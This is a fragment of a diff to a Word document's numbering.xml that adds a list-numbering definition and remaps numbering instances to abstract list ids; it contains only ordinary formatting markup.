+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="79E35021"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3DA6568C"/>
@@ -8714,40 +10549,46 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1830051639">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1548644043">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="92751156">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="390814802">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="1514765802">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="2140680956">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="1634290607">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="1474054670">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="3" w16cid:durableId="92751156">
-    <w:abstractNumId w:val="9"/>
+  <w:num w:numId="9" w16cid:durableId="2020355101">
+    <w:abstractNumId w:val="13"/>
   </w:num>
-  <w:num w:numId="4" w16cid:durableId="390814802">
+  <w:num w:numId="10" w16cid:durableId="799345839">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="11" w16cid:durableId="472672449">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="5" w16cid:durableId="1514765802">
-    <w:abstractNumId w:val="6"/>
+  <w:num w:numId="12" w16cid:durableId="2116365198">
+    <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="6" w16cid:durableId="2140680956">
-    <w:abstractNumId w:val="8"/>
-  </w:num>
-  <w:num w:numId="7" w16cid:durableId="1634290607">
+  <w:num w:numId="13" w16cid:durableId="606545074">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="8" w16cid:durableId="1474054670">
-    <w:abstractNumId w:val="4"/>
-  </w:num>
-  <w:num w:numId="9" w16cid:durableId="2020355101">
-    <w:abstractNumId w:val="11"/>
-  </w:num>
-  <w:num w:numId="10" w16cid:durableId="799345839">
-    <w:abstractNumId w:val="7"/>
-  </w:num>
-  <w:num w:numId="11" w16cid:durableId="472672449">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="12" w16cid:durableId="2116365198">
-    <w:abstractNumId w:val="1"/>
+  <w:num w:numId="14" w16cid:durableId="1394505243">
+    <w:abstractNumId w:val="10"/>
   </w:num>
 </w:numbering>
 </file>
